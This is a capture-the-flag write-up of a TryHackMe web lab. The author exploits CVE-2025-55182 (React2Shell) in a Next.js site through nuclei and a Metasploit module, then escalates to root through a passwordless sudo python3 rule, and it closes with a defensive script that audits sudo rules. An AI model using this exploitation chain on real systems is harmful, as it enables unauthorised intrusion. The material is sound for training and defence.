Corp Website
🌐 Love at First Breach 2026 - Corp Website
| Category | Author |
|---|---|
| 🌐 Web | TryHackMe |
Challenge Prompt
My Dearest Hacker,
Valentine’s Day is fast approaching, and “Romance & Co” are gearing up for their busiest season.
Behind the scenes, however, things are going wrong. Security alerts suggest that “Romance & Co” has already been compromised. Logs are incomplete, developers are defensive, and shareholders want answers now!
As a security analyst, your mission is to retrace the attacker’s steps, uncover how the attackers exploited the vulnerabilities found on the “Romance & Co” web application, and determine exactly how the breach occurred.
You can find the web application here: http://MACHINE_IP:3000
Problem Type
- Web
- React2Shell
- CVE-2025-55182
Solve
Upon visiting the page, we see Romance & Co.
I started this one with a quick nmap scan using `nmap -p 3000 -T4 -A <SITE IP>`.
I spent a lot of time playing with different things on the site, running FFUF, etc., but I noticed this one is built with Next.js.
I decided to run nuclei with `nuclei -u http://<SITE IP>:3000` to see if there were any vulnerabilities:
Jackpot! CVE-2025-55182 is React2Shell, a critical RCE vulnerability.
From there I moved into Metasploit with `msfconsole`.
Then I ran `search CVE-2025-55182` to see if there were any modules to exploit this, and there were:
I ran `use 0` to select the exploit, then `options` to see what I needed to set.
I ran `set RHOSTS SITE_IP`, `set RPORT 3000`, and `set LHOST MY_IP`. Then I ran `exploit` to kick off the attack.
I was able to get a shell as the user daniel:
Since we need the user flag, I ran `cd ~` to go to his home directory, then ran `ls -la` and found the user.txt file. Running `cat` on that file gives us the first flag:
Then I ran `sudo -l` and saw that the daniel user can run `python3` as root with no password:
I then used the GTFOBins Python "File read" technique to read the flag at /root/root.txt:
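As an added defender-side check (not part of the original writeup), this Python script audits `sudo -l` output for the misconfiguration found above: a NOPASSWD entry that lets a user run an interpreter such as `python3` as root, which GTFOBins documents as sufficient to read any file or escape to a shell. The sample output, the hostname `corp`, and the backup script path are constructed for the example; the list of escape-capable binaries is an illustrative subset, not GTFOBins' full catalogue.

```python
import re
from pathlib import PurePosixPath

# Interpreters and utilities GTFOBins documents as able to read arbitrary files
# or spawn a shell when run as root. Illustrative subset (assumption), not exhaustive.
ESCAPE_CAPABLE = {"python", "python2", "python3", "perl", "ruby", "vim", "vi",
                  "less", "more", "find", "awk", "bash", "sh", "env"}

# One privilege line of `sudo -l` output, e.g. "(root) NOPASSWD: /usr/bin/python3".
LINE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# Constructed `sudo -l` output mirroring the finding in the writeup (hostname is made up).
SAMPLE_SUDO_L = """\
Matching Defaults entries for daniel on corp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

User daniel may run the following commands on corp:
    (root) NOPASSWD: /usr/bin/python3
    (root) /usr/bin/systemctl restart romance-web
    (root) NOPASSWD: /usr/bin/python3 /opt/romance/backup.py
"""

def audit_sudo_l(text):
    """Return findings (dicts with command, severity, advice) for passwordless root entries."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers, Defaults lines, blank lines
        runas = m.group("runas").split(":")[0].strip()      # "root" from "(root : root)"
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        cmd = m.group("cmd").strip()
        argv = cmd.split()
        exe = PurePosixPath(argv[0]).name
        if runas not in ("root", "ALL") or "NOPASSWD" not in tags:
            continue  # needs a password, or does not reach root: out of scope here
        if cmd == "ALL":
            findings.append({"command": cmd, "severity": "critical",
                             "advice": "Unrestricted passwordless root; remove NOPASSWD or scope to specific commands."})
        elif exe in ESCAPE_CAPABLE and len(argv) == 1:
            # The classic misconfiguration: no arguments pinned, so any script or file can be passed.
            findings.append({"command": cmd, "severity": "critical",
                             "advice": f"{exe} accepts arbitrary arguments as root; pin it to a fixed script or drop NOPASSWD."})
        elif exe in ESCAPE_CAPABLE:
            findings.append({"command": cmd, "severity": "medium",
                             "advice": f"{exe} is pinned to fixed arguments; verify the script is root-owned and not user-writable."})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[{f['severity']}] {f['command']}: {f['advice']}")
```

Running the script against the constructed sample flags the bare `/usr/bin/python3` entry as critical and the pinned backup script as medium; the `systemctl` entry is ignored because it still requires a password.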